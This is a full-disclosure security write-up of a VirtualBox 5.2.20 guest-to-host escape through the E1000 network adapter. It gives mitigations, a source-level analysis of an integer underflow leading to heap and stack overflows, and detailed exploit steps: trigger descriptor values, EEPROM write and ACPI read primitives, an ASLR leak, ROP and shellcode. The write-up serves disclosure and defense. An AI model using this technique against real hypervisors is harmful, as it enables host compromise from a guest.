Full disclosure: VirtualBox 0day Escape Vulnerability

Published on November 07, 2018

Full disclosure: VirtualBox 0day Escape Vulnerability

image


I like VirtualBox, and it has nothing to do with the reason I post information about the vulnerability. The reason is disagreement with the current realities in information security, more precisely, in the direction of security research and bug bounty.


  1. It is considered normal to wait for a patch for vulnerabilities for half a year, if only these bugs are no longer in public access.
  2. In the area of ​​bug bounty programs is considered normal:
    1. Wait more than a month until the vulnerability is verified and the decision to acquire it is announced.
    2. On the go, change the decision on whether the program will buy bugs for this software. Today you have learned that yes, they will buy, and in a week you come with bugs and exploits and get the answer that no, they will not.
    3. Do not have a clear list of applications for which the bugs will pay. Yes, it is convenient for bug bounty organizers, no, it is inconvenient for researchers.
    4. Not have a clearly defined upper and lower price limits for vulnerabilities. There are a lot of factors affecting the price, but researchers should see what it is worth wasting their time and what is not worth the day of work.
  3. Mania of greatness and marketing nonsense: give names to vulnerabilities and create websites for them; hold a thousand conferences a year; to exaggerate the importance of their work; consider yourself the "savior of the world." Go down to earth, Your Highness.

The first two points exhausted me completely, so my move was full disclosure.


general information


Vulnerable software: VirtualBox 5.2.20 and earlier.
Host OS: any, the bug is in a common code base.
Guest OS: any.
VM configuration: by default (for operation it is only necessary that the network card is Intel PRO / 1000 MT Desktop (82540EM), and the mode of operation is NAT).


How to protect


Until the patched version of VirtualBox is released, change the settings of your virtual machines to the network card on PCnet (either of the two) or on the Paravirtualized Network. If there is no way to do this, then change the mode of operation with NAT to any other for the Intel adapter. The first option is more reliable.


Introduction


When creating a new virtual machine, the default network adapter is the Intel PRO / 1000 MT Desktop (82540EM), configured to work in NAT mode. For brevity, we will call it E1000.


The virtual device code E1000 contains a vulnerability that allows an attacker with root / administrator rights in the guest OS to escape to the host OS and execute code in ring 3. Then the attacker can use the already well-known techniques for raising privileges to ring 0 using the VirtualBox / dev / vboxdrv driver .


Vulnerability analysis


General information about the E1000


To send network packets, the guest does the same thing as a regular computer: configures the network adapter and gives it packets that consist of data link frames and other higher level headers. Packets are not transmitted to the adapter by themselves, but wrapped in Tx-handles (Transmit Descriptor). These data structures, described in the network card specification (317453006EN.PDF, Revision 4.0), store various meta-information, such as packet size or VLAN tag, manage TCP / IP segmentation, etc.


The 82540EM specification provides three types of Tx-descriptors: legacy, context, data. Legacy descriptors were relevant, apparently, in the past. The remaining two are used in conjunction. For us, it is only important that context-descriptors set the maximum packet size and enable / disable TCP / IP-segmentation, and the data-descriptors contain the addresses of the packages in physical memory and specify their size. The packet size in the data descriptor cannot be larger than the one specified in the context descriptor. Context descriptors are transferred to the network card, as a rule, before the data descriptors.


To send Tx-descriptors to the network adapter, they are recorded in the Tx-ring (Transmit Descriptor Ring). This is a ring buffer located in physical memory at a predefined address. When all the required descriptors are written to the ring, the guest updates the TDT (Transmit Descriptor Tail) register in the MMIO adapter, which signals the host that there are new descriptors that need to be processed.


Initial data


We have the following array of Tx-descriptors:


[context_1, data_2, data_3, context_4, data_5]

Suppose that they contain the following information (the names of the fields are specifically made human-readable, but they correspond to the descriptor fields from the 82540EM specification):


context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true
data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true
data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true
context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true
data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

Soon we will understand why the descriptors should be just such for the operation of the error.


The essence of the vulnerability


Processing [context_1, data_2, data_3]


Imagine that a guest recorded the above descriptors in the Tx-ring in exact order and updated the TDT register. Now the VirtualBox process on the host will perform the e1kXmitPending function, which is located in the src / VBox / Devices / Network / DevE1000.cpp file (most of the comments have been deleted here for readability):


static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
        while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
        {
            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

The e1kTxDLazyLoad function counts all 5 Tx descriptors from a Tx-ring. Then e1kLocateTxPacket will be called for the first time. This function bypasses all the descriptors and prepares the state for further work, but does not perform most of the work on the processing of the descriptors. In our case, the first call to e1kLocateTxPacket will handle the context_1, data_2, data_3 descriptors. The two remaining descriptors, context_4 and data_5, will be processed at the next iteration of the while loop (we will look at the second iteration in the next section). This split of the array of descriptors in two leads to important consequences, so let's see why it happens.


The e1kLocateTxPacket function looks like this:


static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
    for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
        switch (e1kGetDescType(pDesc))
        {
            case E1K_DTYP_CONTEXT:
                e1kUpdateTxContext(pThis, pDesc);
                continue;
            case E1K_DTYP_LEGACY:
                ...
                break;
            case E1K_DTYP_DATA:
                if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
                    break;
                ...
                break;
            default:
                AssertMsgFailed(("Impossible descriptor type!"));
        }

The first descriptor (context_1) is E1K_DTYP_CONTEXT, therefore the function e1kUpdateTxContext is called. This function updates the TCP segmentation context if segmentation was requested in the descriptor. This is true for our context_1 descriptor (see the previous section), so the TCP segmentation context will be updated (the essence of the "TCP segmentation context update" is not interesting for us, so we will use this term simply to refer to this section of code).


The second descriptor (data_2) is E1K_DTYP_DATA, for it some other actions are performed that have no meaning for us.


The third descriptor (data_3) is E1K_DTYP_DATA, but since data_3.data_length == 0 (pDesc-> data.cmd.u20DTALEN in the code above), no action is taken.
At this point in time, all three descriptors are initially processed, and we have two more unprocessed descriptors. Now the focus: in the above code, after the switch statement, it is checked whether the end_of_packet flag is set in the descriptor. This is true for the data_3 descriptor (data_3.end_of_packet == true), so the code performs some actions and exits the function:


        if (pDesc->legacy.cmd.fEOP)
        {
            ...
            return true;
        }

If the data_3.end_of_packet flag were not set, then the remaining two descriptors would also be initially processed, and this would prevent the vulnerability. Below, you will see why this exit from the function even before traversing all the descriptors leads to a bug.


So, when returning from e1kLocateTxPacket, we have the following descriptors, ready to extract network packets from them and send to the network: context_1, data_2, data_3. Now in the internal while loop of the e1kXmitPending function, e1kXmitPacket is called. This function again bypasses all the descriptors (5 in our case) in order to finally process them:


static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
    while (pThis->iTxDCurrent < pThis->nTxDFetched)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
        ...
        rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
        ...
        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;
    }

For each descriptor, the e1kXmitDesc function is called:


static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
                       bool fOnWorkerThread)
{
...
    switch (e1kGetDescType(pDesc))
    {
        case E1K_DTYP_CONTEXT:
            ...
            break;
        case E1K_DTYP_DATA:
        {
            ...
            if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
            {
                E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
            }
            else
            {
                if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
                {
                    ...
                }
                else if (!pDesc->data.cmd.fTSE)
                {
                    ...
                }
                else
                {
                    STAM_COUNTER_INC(&pThis->StatTxPathFallback);
                    rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
                }
            }
            ...

The first descriptor that is passed to e1kXmitDesc is context_1. The function does nothing for context descriptors.


The second handle is data_2. Since we set the tcp_segmentation_enable == true flag for all data descriptors (pDesc-> data.cmd.fTSE in the code above), we call the e1kFallbackAddToFrame function, where later an integer variable will overflow when processing the data_5 handle.


static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
    ...
    uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;
    /*
     * Carve out segments.
     */
    int rc = VINF_SUCCESS;
    do
    {
        /* Calculate how many bytes we have left in this TCP segment */
        uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            /* This descriptor fits completely into current segment */
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
        else
        {
            ...
        }
        pDesc->data.u64BufAddr    += cb;
        pDesc->data.cmd.u20DTALEN -= cb;
    } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));
    if (pDesc->data.cmd.fEOP)
    {
        ...
        pThis->u16TxPktLen = 0;
        ...
    }
    return VINF_SUCCESS;
}

The most important variables for us are here: u16MaxPktLen, pThis-> u16TxPktLen, pDesc-> data.cmd.u20DTALEN.


Let's draw a table where the values ​​of the variables will be indicated before and after the e1kFallbackAddToFrame function is executed for two data descriptors.


Tx handle Before after u16MaxPktLen pThis-> u16TxPktLen pDesc-> data.cmd.u20DTALEN
data_2 Before 0x3010 0 0x10
- After 0x3010 0x10 0
data_3 Before 0x3010 0x10 0
- After 0x3010 0x10 0

For us, the only important thing is that when data_3 is processed, pThis-> u16TxPktLen is 0x10.
And now the most important point. Take another look at the end of the listing for the e1kXmitPacket function:


        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;

Since the data_3 descriptor type is not equal to E1K_DTYP_CONTEXT, and since data_3.end_of_packet == true, we break the loop despite the fact that we also need to handle the context_4 and data_5. Again, we have not finished working with the descriptors, as is the case with the initial processing. Why is it important? To understand the essence of the vulnerability, you need to understand that all context-descriptors are processed before the data-descriptors. Context descriptors are processed during the update of the TCP segmentation context in the e1kLocateTxPacket function. Data descriptors are processed later in the e1kXmitPacket function. The developers have done so in order to prohibit changing the variable u16MaxPktLen, which is controlled by context-descriptors, after several bytes of network packets have been processed. If we could change context descriptors at any time,


uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;

But we can bypass this overflow protection. Recall that back in e1kLocateTxPacket, we forced the function to perform a return due to the fact that data_3.end_of_packet == true. Because of this, we still have two more descriptors (context_4 and data_5) waiting for initial and final processing, despite the fact that we have already processed a few bytes (pThis-> u16TxPktLen is 0x10, not zero).


So, we have the opportunity to change u16MaxPktLen arbitrarily using context_4.maximum_segment_size to achieve integer overflow.


Processing [context_4, data_5]


We have completely processed the first three descriptors and return to the beginning of the internal while loop of the e1kXmitPending function:


            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

Here we call e1kLocateTxPacket to perform the initial processing of context_4 and data_5. As mentioned earlier, we can set the value of context_4.maximum_segment_size in an arbitrary manner, incl. such that it will be less than the size of the data that we have already processed. Remember our initial data:


context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true
data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

After running e1kLocateTxPacket, we have a maximum network packet size of 0xF, while the size of the already processed data is 0x10.


Finally, during the processing of data_5, the function e1kFallbackAddToFrame is called, where we have the following variable values:


Tx handle Before after u16MaxPktLen pThis-> u16TxPktLen pDesc-> data.cmd.u20DTALEN
data_5 Before 0xF 0x10 0x4188
- After - - -

As a result, an integer overflow occurs:


uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
=>
uint32_t cb = 0xF - 0x10 = 0xFFFFFFFF;

This allows us to successfully perform the following check, because 0xFFFFFFFF> 0x4188:


        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }

Now the e1kFallbackAddSegment function will be called with a size (cb) of 0x4188. Without a vulnerability, it is impossible to call this function with a size greater than 0x4000, since In the process of updating the TCP segmentation context, it is checked that the maximum segment size is less than or equal to 0x4000:


DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
        uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
        if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
        {
            pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
            ...
        }

Buffer overflow


How can we exploit our ability to call the e1kFallbackAddSegment function with an arbitrary size? I found at least two possibilities. First, the data that the guest sends is copied to the buffer on the heap:


static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
    ...
    PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                      pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

Here, pThis-> aTxPacketFallback is a buffer of size 0x3FA0, and u16Len is 0x4188 — an obvious heap overflow that could lead, say, to rewriting pointers to functions, objects, or anything else.


Secondly, if we look deeper, we find that e1kFallbackAddSegment calls the e1kTransmitFrame function, which, with a certain configuration of the network adapter registers, calls e1kHandleRxPacket. This function allocates a buffer of size 0x4000 on the stack and copies data with the specified size into it without any checks, since they were performed earlier:


static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
    uint8_t   rxPacket[E1K_MAX_RX_PKT_SIZE];
    ...
    if (status.fVP)
    {
        ...
    }
    else
        memcpy(rxPacket, pvBuf, cb);

As you can see, we have converted the integer overflow vulnerability to the classic stack buffer overflow vulnerability. Both of the examples above, heap buffer overflow and stack buffer overflow, are involved in the exploit.


Exploit


The exploit is the Linux kernel module, which is loaded into the guest OS. For Windows, you need a driver that will be different except as a wrapper for initialization and other calls to the nuclear API.


Driver loading on both operating systems requires elevated privileges. This is a normal phenomenon and is not considered an insurmountable obstacle. For example, take a look at the Pwn2Own competition, where researchers use exploit chains: the guest OS uses a browser that opens a “malicious” site, escapes from the browser sandbox for full access to the ring 3 context, exploits a vulnerability in the operating system to access ring 0 , from where all possibilities for attack on a hypervisor from guest OS open.


Of course, the most powerful vulnerabilities in hypervisors are those that are exploited from ring 3 of the guest. In VirtualBox, too, there is code that is reachable without root privileges, and it is still poorly understood.


The exploit is 100% stable. This means that it either always works, or does not work at all due to inappropriate binaries or something more problematic, which I have not provided for. On guest Ubuntu 16.04 and 18.04 x86_64 with the default configuration, it works.


Operation algorithm


  1. The attacker unloads the e1000.ko ​​kernel module, which runs by default on Linux guest systems, and loads its driver.
  2. The driver initializes the E1000 network adapter according to the specification. Only the transmit-part is initialized, since The receive part is not used.
  3. Step 1: information leak.
    1. The loopback mode of the network adapter is disabled, so the code containing the stack buffer overflow will be unreachable.
    2. With the help of the main vulnerability is done integer underflow, leading to the heap buffer overflow, but not the stack buffer overflow.
    3. Heap buffer overflow leads to the fact that when interacting with the network adapter EEPROM, you can write any two bytes relative to the buffer on the heap within 128 kilobytes. Thus, the attacker receives a write primitive.
    4. Using a write primitive, eight bytes are written to the data structure on the heap relating to the Advanced Configuration and Power Interface (ACPI) device. A byte is written to a variable that is used when accessing ACPI as an index into an array on the heap from which one byte will be read. Since the size of the array is smaller than the number that is placed in byte (255), the attacker can read outside the array, i.e. gets a read primitive.
    5. With a read primitive, an attacker makes 8 requests to ACPI and gets 8 bytes from the heap. These 8 bytes are a pointer to the VBoxDD.so dynamic library.
    6. The driver subtracts the constant from the pointer and gets the base address of the library VBoxDD.so.
  4. Step 2: stack buffer overflow.
    1. The loopback mode of the network adapter is enabled, so that the code containing the stack buffer overflow will be reachable.
    2. With the help of the main vulnerability is done integer underflow, leading to the heap buffer overflow and stack buffer overflow. Overwrites the return address stored on the stack (RIP / EIP). The attacker gains control of the execution.
    3. A chain of ROP gadgets is executed, which transfers control to the shellcode loader.
  5. Step 3: shellcode.
    1. The shellcode loader copies next to it the main shellcode from the buffer on the stack. Control is transferred to the shellcode.
    2. The shellcode makes the fork and execve system calls to create an arbitrary process on the host side.
    3. The parent process performs the final steps so that the virtual machine does not collapse and continues normal operation.
  6. The attacker unloads the driver and loads the e1000.ko ​​back so that the guest OS can continue to work with the network.

Initialization


The driver maps a portion of the physical memory corresponding to the MMIO network card to virtual memory. The physical address and size is set by the hypervisor.


void* map_mmio(void) {
    off_t pa = 0xF0000000;
    size_t len = 0x20000;
    void* va = ioremap(pa, len);
    if (!va) {
        printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
        return NULL;
    }
    return va;
}

Then, the configuration of general-purpose registers E1000 is performed, the memory for the Tx-ring is allocated and the transmit-registers are configured.


void e1000_init(void* mmio) {
    // Configure general purpose registers
    configure_CTRL(mmio);
    // Configure TX registers
    g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
    if (!g_tx_ring) {
        printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
        return;
    }
    configure_TDBAL(mmio);
    configure_TDBAH(mmio);
    configure_TDLEN(mmio);
    configure_TCTL(mmio);
}

ASLR bypass


Write primitive


From the beginning of the development of the exploit, I decided to abandon the use of primitives found in the VirtualBox subsystems that were disabled by default. First of all, it refers to the Chromium service (not the browser), which is responsible for 3D acceleration, in which over the past year, researchers have found more than 40 vulnerabilities. Information leak is a leak of information, usually a pointer with respect to some dynamic library where you can get its base address and bypass the ASLR protection.


There was a problem: to find the information leak vulnerability in the components running by default. There was an obvious thought that since our main vulnerability allows us to overflow a heap, i.e. belongs to the class of heap buffer overflow, we control everything that is outside of this buffer. Then we will see that no additional vulnerabilities were needed: our integer underflow was so powerful that it gave read and write primitives, as well as information leak and stack buffer overflow.


Let's see what exactly is overflowing on the heap.


/**
 * Device state structure.
 */
struct E1kState_st
{
...
    uint8_t     aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
    E1kEEPROM   eeprom;
...
}

Here aTxPacketFallback is a buffer of size 0x3FA0 that will be filled with data read from the data descriptor. Looking for what interesting fields behind this buffer can be changed, the E1kEEPROM structure came across. Inside it there is another structure with such fields (file src / VBox / Devices / Network / DevE1000.cpp):


/**
 * 93C46-compatible EEPROM device emulation.
 */
struct EEPROM93C46
{
...
    bool m_fWriteEnabled;
    uint8_t Alignment1;
    uint16_t m_u16Word;
    uint16_t m_u16Mask;
    uint16_t m_u16Addr;
    uint32_t m_u32InternalWires;
...
}

What can we give them a modification? In the E1000 code, work with the EEPROM, the permanent memory of the network adapter, is implemented. The guest OS can access it using certain EMI000 MMIO registers. Work with EEPROM is implemented as a finite state machine, which has several states and performs four actions. We will be interested only in the "write to memory" action. Here’s what it looks like (src / VBox / Devices / Network / DevEEPROM.cpp file):


EEPROM93C46::State EEPROM93C46::opWrite()
{
    storeWord(m_u16Addr, m_u16Word);
    return WAITING_CS_FALL;
}
void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
    if (m_fWriteEnabled) {
        E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
        m_au16Data[u32Addr] = u16Value;
    }
    m_u16Mask = DATA_MSB;
}

Here, m_u16Addr, m_u16Word, and m_fWriteEnabled are the values ​​of the fields in the EEPROM93C46 structure, which we completely control. Therefore, you can set them in such a way that when you run the instructions


m_au16Data[u32Addr] = u16Value;

two bytes will be written at an arbitrary 16-bit offset from the m_au16Data array, which is located in the same structure. We found a write primitive.


Read primitive


The next task was to search for data structures on the heap that would make sense to write arbitrary data, not forgetting that the main goal is to merge the pointer relative to some module in order to get its base address. Fortunately, it was not necessary to resort to unstable filling of the heap (heap spray), since it turned out that the basic data structures for virtual devices are separated from the internal hypervisor heap in such a way that each time VirtualBox starts, the distance between these heap blocks is the same despite the fact that the virtual block addresses are different for each launch due to ASLR.


Specifically, when VirtualBox is launched, the PDM (Pluggable Device and Driver Manager) subsystem for each device creates a PDMDEVINS object, which is allocated from the hypervisor heap.


int pdmR3DevInit(PVM pVM)
{
...
        PPDMDEVINS pDevIns;
        if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
            rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
        else
            rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...

I drove this section of code under the GDB debugger using a script and got something like this:


[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8
[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8
...
[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0
[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848
[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728
[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570
[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90
[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30

We are interested in the device under the symbol 0xE, corresponding to E1000. The second list shows that the device following the E1000 is at a distance of 0x5700 bytes, the next one is another 0x19E0 bytes, and so on. And as mentioned above, these distances are always the same, which opens up a sea of ​​possibilities for exploitation.


After E1000, we have the following devices in ascending order of addresses: ICH IC'97, OHCI, ACPI, VirtualBox GIM. Studying the data structures corresponding to these devices, I found an excellent opportunity to apply our write-primitive.


When you start the virtual machine, an ACPI device is created (src / VBox / Devices / PC / DevACPI.cpp file):


typedef struct ACPIState
{
...
    uint8_t             au8SMBusBlkDat[32];
    uint8_t             u8SMBusBlkIdx;
    uint32_t            uPmTimeOld;
    uint32_t            uPmTimeA;
    uint32_t            uPmTimeB;
    uint32_t            Alignment5;
} ACPIState;

A handler for I / O ports in the range 0x4100-0x410F is registered for it. In the case of port 0x4107, we have the following code:


PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
    RT_NOREF1(pDevIns);
    ACPIState *pThis = (ACPIState *)pvUser;
...
    switch (off)
    {
...
        case SMBBLKDAT_OFF:
            *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
            pThis->u8SMBusBlkIdx++;
            pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
            break;
...

When the guest OS executes the INB processor instruction with an argument of 0x4107 to read one byte from the port, the handler takes a byte from the au8SMBusBlkDat [32] array by the index u8SMBusBlkIdx and returns it to the guest. This is where the possibility of using a write-primitive appears: since the distance between the heap blocks for virtual devices does not change, the distance from the EEPROM93C46.m_au16Data array to the ACPIState.u8SMBusBlkIdx field is fixed. By writing two bytes to ACPIState.u8SMBusBlkIdx, we can read arbitrary bytes at a distance of 255 bytes relative to ACPIState.au8SMBusBlkDat.


The problem is different. If you look at the ACPIState structure, you can see that the array is almost at the end of the structure, and behind it is the u8SMBusBlkIdx field and several other fields that are completely useless for us. It turns out that we can read from the ACPIState structure, but there is nothing. Well, we are no stranger, so let's see what lies in the memory outside the structure.


gef➤  x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0: 0xffffe98100000090  0xfffd9b2000000000
0x7fc47008d4f0: 0x00007fc470067a00  0x00007fc470067a00
0x7fc47008d500: 0x00000000a0028a00  0x00000000000e0000
0x7fc47008d510: 0x00000000000e0fff  0x0000000000001000
0x7fc47008d520: 0x000000ff00000002  0x0000100000000000
0x7fc47008d530: 0x00007fc47008c358  0x00007fc44d6ecdc6
0x7fc47008d540: 0x0031000035944000  0x00000000000002b8
0x7fc47008d550: 0x00280001d3878000  0x0000000000000000
gef➤  x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6: "ACPI RSDP"
gef➤  vmmap VBoxDD.so
Start                           End                             Offset                          Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤  p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6

